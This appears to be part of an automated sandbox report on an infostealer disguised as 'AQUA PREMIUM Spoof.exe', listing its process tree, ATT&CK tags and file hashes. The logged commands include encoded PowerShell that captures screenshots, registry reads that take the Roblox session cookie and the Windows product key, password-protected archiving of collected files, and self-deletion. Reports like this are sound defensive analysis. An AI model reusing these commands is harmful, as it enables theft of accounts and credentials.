IAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵PID:920
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4392 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lleudvyv\lleudvyv.cmdline"5⤵PID:3980
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESABE0.tmp" "c:\Users\Admin\AppData\Local\Temp\lleudvyv\CSC6DE91CB8B0BE412E80AACD85DF3CDF2C.TMP"6⤵PID:3248
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:2380
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:456
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"3⤵PID:2140
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:320
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:4676
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:4772
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"3⤵PID:4956
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts4⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:4628
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:3972
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:3408
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:3372
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:2088
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:1240
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:4092
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:3724
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:4648
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:2064
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3472
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"3⤵PID:3528
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2140
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY4⤵
- Suspicious behavior: EnumeratesProcesses
PID:4612
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"3⤵PID:3344
-
C:\Windows\system32\getmac.exegetmac4⤵PID:1172
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI37562\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\aPqap.zip" *"3⤵PID:5060
-
C:\Users\Admin\AppData\Local\Temp\_MEI37562\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI37562\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\aPqap.zip" *4⤵
- Executes dropped EXE
PID:4516
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"3⤵PID:3248
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption4⤵PID:956
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"3⤵PID:4900
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory4⤵PID:3560
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵PID:3608
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵PID:3424
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"3⤵PID:3036
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3320
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵PID:2120
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:3348
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"3⤵PID:3780
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault4⤵
- Suspicious behavior: EnumeratesProcesses
PID:2052
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\AQUA PREMIUM Spoof.exe""3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4772 -
C:\Windows\system32\PING.EXEping localhost -n 34⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1792
-
-
-
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:4676
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
Hide Artifacts
2Hidden Files and Directories
2Obfuscated Files or Information
1Command Obfuscation
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5cadef9abd087803c630df65264a6c81c
SHA1babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA5127278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085
-
Filesize
944B
MD5624e41a75a6dfd62039973dbbfdbe622
SHA1f791e4cc85d6ae7039acef57a9025b173d7e963b
SHA256ced1b5ac330145fa608627ad4de1dfb3533375f19b6da3d02ad202d0b7732bc1
SHA512a13a128a5ea8aad3bcd5f3dbffa5fbfe7763370d8e43b546a1df1da3b0ec0d520cf5fcc8c25c22fd1e73ea1d00da1bee99305e028e71e193339e4fa8ce8f0b2d
-
Filesize
1KB
MD5ed4c7b8ff16f1b04424b77a68fa09c11
SHA14b1b149242caca5ac4727d0e805583409a23fdf2
SHA2567788beb06344eaf4db93daccb857836067df1aa2b6b11298810e845c8faac18d
SHA51205bf5b9dadb27cb12e9f3b5dacd8e1f76915673000d7f9b0fc8e875ecdfeff939d8238432f5aea6d73b722c2716181b591abf8f1a4bcc1ffe71d0b32c6a8f24f
-
Filesize
1KB
MD5548dd08570d121a65e82abb7171cae1c
SHA11a1b5084b3a78f3acd0d811cc79dbcac121217ab
SHA256cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc
SHA51237b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b
-
Filesize
1KB
MD564f1d225950a96283a77476e16c1ea28
SHA1325b996da05c2f6c4ea47fa9318d1c1e5c80a8d2
SHA256eaafbaa2c813ca5952deae2789a9737303d1d64d5a35d36032df4fbb8269c3e3
SHA51225a222babaef0f12c8f4a1c17d2292a5b0802563263ecbb7c5b500ae21562523764428f04f43ea481c4693c3770f63a30e60e3388c9bb363a82b0a35352fcad6
-
Filesize
95KB
MD5f34eb034aa4a9735218686590cba2e8b
SHA12bc20acdcb201676b77a66fa7ec6b53fa2644713
SHA2569d2b40f0395cc5d1b4d5ea17b84970c29971d448c37104676db577586d4ad1b1
SHA512d27d5e65e8206bd7923cf2a3c4384fec0fc59e8bc29e25f8c03d039f3741c01d1a8c82979d7b88c10b209db31fbbec23909e976b3ee593dc33481f0050a445af
-
Filesize
47KB
MD5f6e387f20808828796e876682a328e98
SHA16679ae43b0634ac706218996bac961bef4138a02
SHA2568886bd30421c6c6bfae17847002b9bf4ee4d9eee1a3be7369ee66b36e26c372b
SHA512ad7cf281f2d830f9dbf66d8ef50e418b4a17a0144b6616c43d7e98b00e6f0cbafc6fe4aba4fabf2f008bb0df85553614b38ae303e5726621a804051d950e744e
-
Filesize
58KB
MD548ce90022e97f72114a95630ba43b8fb
SHA1f2eba0434ec204d8c6ca4f01af33ef34f09b52fd
SHA2565998de3112a710248d29df76a05272775bf08a8dbc5a051a7ecb909fef069635
SHA5127e6c2591805136f74c413b9633d5fdc4428e6f01e0e632b278bee98170b4f418ef2afd237c09e60b0e72076924ed0e3ffb0e2453e543b5e030b263f64568fab8
-
Filesize
105KB
MD52030438e4f397a7d4241a701a3ca2419
SHA128b8d06135cd1f784ccabda39432cc83ba22daf7
SHA25607d7ac065f25af2c7498d5d93b1551cc43a4d4b5e8fb2f9293b647d0f7bd7c72
SHA512767f2a9f9eef6ebeca95ab9652b7d0976f2ac87b9e9da1dbd3c4ccf58e8ecb0da8242f4df0b07612282c16ba85197ed0296d1052027cd48b96d61bdf678abaad
-
Filesize
35KB
MD513f99120a244ab62af1684fbbc5d5a7e
SHA15147a90082eb3cd2c34b7f2deb8a4ef24d7ae724
SHA25611658b52e7166da976abeeed78a940d69b2f11f518046877bea799759a17f58b
SHA51246c2f9f43df6de72458ed24c2a0433a6092fd5b49b3234135f06c19a80f18f8bdbfb297e5a411cf29f8c60af342c80db123959f7317cfa045c73bd6f835eb22d
-
Filesize
85KB
MD57c66f33a67fbb4d99041f085ef3c6428
SHA1e1384891df177b45b889459c503985b113e754a3
SHA25632f911e178fa9e4db9bd797598f84f9896f99e5022f2b76a1589b81f686b0866
SHA512d0caabd031fa0c63f4cfb79d8f3531ad85eda468d77a78dd3dde40ce9ac2d404fc0099c4f67579aa802fe5c6c6a464894fd88c19f1fc601f26189780b36f3f9d
-
Filesize
25KB
MD5f9d8b75ccb258b8bc4eef7311c6d611d
SHA11b48555c39a36f035699189329cda133b63e36b5
SHA256b3d9763fc71b001a1a2cc430946933e3832f859eb7857b590f8daeef8017179c
SHA512cbf8490501b002eec96ae6c1fa4f3684aa1cab1e63025087df92c0e857299b9b498bff91c1f301f926ff86e0dc81e8f0c17db992366bed3cd9f41bcae43542db
-
Filesize
42KB
MD50dd957099cf15d172d0a343886fb7c66
SHA1950f7f15c6accffac699c5db6ce475365821b92a
SHA2568142d92dc7557e8c585ea9ee41146b77864b7529ed464fdf51dfb6d797828a4a
SHA5123dc0380dfc871d8cab7e95d6119f16be2f31cdde784f8f90ffddd6a43323a2988c61e343eede5e5cb347fc2af594fe8d8944644396faf2e478a3487bcf9cf9ee
-
Filesize
49KB
MD5dde6bab39abd5fce90860584d4e35f49
SHA123e27776241b60f7c936000e72376c4a5180b935
SHA256c84e5f739ce046b4582663a3017f31fe9ae5e706e087ac4c5ff11c7bba07b5f9
SHA5128190c6befbe660096363409cb82977e9dce5ab9a78c60f3d3db9dc08a2300504f9b2058d8cfb740d7a17995267d8005392ee0f1a03fb74030286fbc7a9c287de
-
Filesize
62KB
MD5a4dba3f258344390ee9929b93754f673
SHA175bbf00e79bb25f93455a806d0cd951bdd305752
SHA256e0aa8cfa2e383820561bce2aee35b77a6902ff383076c237c7859cd894d37f49
SHA5126201e0d840f85d1627db849bfaf4a32f6fc0634a16416074fe6d13329317520b0a06806ad3337a3370dcc1c1e3d1910d18c823c6a7a62efe400de36b28d1767a
-
Filesize
859KB
MD53ae8624c9c1224f10a3135a7039c951f
SHA108c18204e598708ba5ea59e928ef80ca4485b592
SHA25664dfc4067a99c71094b4a9aa8e50344e7d42ea9a0d376cbcd419c04e53384285
SHA512c47ea6b8e004c27fa29e84f6363f97e775c83a239eb3ae75dedca79e69db02b431a586877ee8f948f83b522b00c20e6b1d5864628c2aef9e33e0be95fe6e3254
-
Filesize
79KB
MD55fd29f5fbc655b71fbeb218e5a7ea82f
SHA12cdab6b0d43ae774388967a2e04dbbefc6daa95a
SHA2561a12ecda1141350d41d3fb09e7c290480ffb0e04c4f11ec2cf9361885f86d33a
SHA5129760800ff16c6332f59ee89b5e8a800d181ae06c713ecb851379decbac0fd0eb8909c1868106493df1bd1280a27f49bbc385cc6cab160f834b78bd03554be250
-
Filesize
1.1MB
MD5e5aecaf59c67d6dd7c7979dfb49ed3b0
SHA1b0a292065e1b3875f015277b90d183b875451450
SHA2569d2257d0de8172bcc8f2dba431eb91bd5b8ac5a9cbe998f1dcac0fac818800b1
SHA512145eaa969a1a14686ab99e84841b0998cf1f726709ccd177acfb751d0db9aa70006087a13bf3693bc0b57a0295a48c631d0b80c52472c97ebe88be5c528022b4
-
Filesize
23KB
MD56f818913fafe8e4df7fedc46131f201f
SHA1bbb7ba3edbd4783f7f973d97b0b568cc69cadac5
SHA2563f94ee4f23f6c7702ab0cc12995a6457bf22183fa828c30cc12288adf153ae56
SHA5125473fe57dc40af44edb4f8a7efd68c512784649d51b2045d570c7e49399990285b59cfa6bcd25ef1316e0a073ea2a89fe46be3bfc33f05e3333037a1fd3a6639
-
Filesize
203KB
MD57bcb0f97635b91097398fd1b7410b3bc
SHA17d4fc6b820c465d46f934a5610bc215263ee6d3e
SHA256abe8267f399a803224a1f3c737bca14dee2166ba43c1221950e2fbce1314479e
SHA512835bab65d00884912307694c36066528e7b21f3b6e7a1b9c90d4da385334388af24540b9d7a9171e89a4802612a8b6523c77f4752c052bf47adbd6839bc4b92c
-
Filesize
1.4MB
MD53f782cf7874b03c1d20ed90d370f4329
SHA108a2b4a21092321de1dcad1bb2afb660b0fa7749
SHA2562a382aff16533054e6de7d13b837a24d97ea2957805730cc7b08b75e369f58d6
SHA512950c039eb23ed64ca8b2f0a9284ebdb6f0efe71dde5bbf0187357a66c3ab0823418edca34811650270eea967f0e541eece90132f9959d5ba5984405630a99857
-
Filesize
615KB
MD59c223575ae5b9544bc3d69ac6364f75e
SHA18a1cb5ee02c742e937febc57609ac312247ba386
SHA25690341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA51257663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09
-
Filesize
456B
MD54531984cad7dacf24c086830068c4abe
SHA1fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA25658209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA51200056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122
-
Filesize
25KB
MD55c66bcf3cc3c364ecac7cf40ad28d8f0
SHA1faf0848c231bf120dc9f749f726c807874d9d612
SHA25626dada1a4730a51a0e3aa62e7abc7e6517a4dc48f02616e0b6e5291014a809cc
SHA512034cd4c70c4e0d95d6bb3f72751c07b8b91918aabe59abf9009c60aa22600247694d6b9e232fefff78868aad20f5f5548e8740659036096fab44b65f6c4f8db6
-
Filesize
622KB
MD5ad4bcb50bb8309e4bbda374c01fab914
SHA1a299963016a3d5386bf83584a073754c6b84b236
SHA25632c0978437c9163bb12606607e88701dd79400cdde926d890cdbf6334c2b8435
SHA512ba6bfa3c27fa4285eeb2978ff17cba94375d84d7c0f79150d1f2f7163c80c347b84d712da83435e8d13e27ed59ea0375edb5af2ea1ba67b2c77b6dfcb62ad65a
-
Filesize
289KB
MD5dfa1f0cd0ad295b31cb9dda2803bbd8c
SHA1cc68460feae2ff4e9d85a72be58c8011cb318bc2
SHA25646a90852f6651f20b7c89e71cc63f0154f00a0e7cd543f046020d5ec9ef6cb10
SHA5127fbdfd56e12c8f030483f4d033f1b920968ea87687e9896f418e9cf1b9e345e2be2dc8f1ea1a8afb0040a376ffb7a5dc0db27d84fb8291b50e2ed3b10c10168e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD509b1deb027cbee39288a3dad4741dd95
SHA1e75c891a82e1f6fc03aed2f264bd261519e010ae
SHA2561b2c8e9d25ce8c8b4cf548c814f7f7f782cb5311e412d7764e8c546981a20ac4
SHA5129c67bcb1645c41337234df23df741bb98b033c8a2c2df62c8a4e67044a2ddfc5b7b3ffcbebcd0a97e87dfdf759e1d316b4aa09a19bdf7baaaeba8ead359895eb
-
Filesize
12KB
MD5994251f6b80a766a35b9236cd37db1dd
SHA1764c12ed7582e27745431e2f2fe221157038ec54
SHA25656c542935e05ff8dd2c0a8bbe5b3b99c21625d78f0edc391952b50adec489042
SHA512c0d65c7c0d0f6dec3e8a6291289df0ec6ee88dd55d1e582c814654f145f5bfde4a476276b648ee2b39fb5d6ec7a1198bde1d026a48f1ae861240abef1c8dab9f
-
Filesize
231KB
MD56fdb348eef545fc9a3571893bf41e81c
SHA1d5610efcfe719a1fbc2655dc6aec8076616e685a
SHA25671040cd43d5316596c784383a31640b7af1a5520e35362685aee1e5e083c437a
SHA512cf74e2338681e22e2092faafb3974c710960957360b6f134d00da4da05afb1b1864b61eb25835e01f81de9d9d086a480b97c9d0472503b37c931bb8533de82c3
-
Filesize
9KB
MD5168b4ddd9f62fc431151721e0bb4760b
SHA1337ec16c33b4671ca11debf89b3212b7a8215935
